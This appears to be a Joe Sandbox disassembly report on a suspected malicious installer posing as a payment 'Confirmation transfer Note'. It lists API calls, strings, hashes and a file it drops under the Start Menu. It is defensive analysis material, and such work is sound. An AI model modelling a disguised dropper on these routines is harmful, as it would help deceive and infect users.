Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE
"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe", xrefs: 004061C0
C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040617D, 00406182

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-908710460
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 004024EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1453599865-3369475305
Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(0002C87B,00000064,0003267C), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

unpacking data: %d%%, xrefs: 00402CBD, 00402CCD
verifying installer: %d%%, xrefs: 00402CC4

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
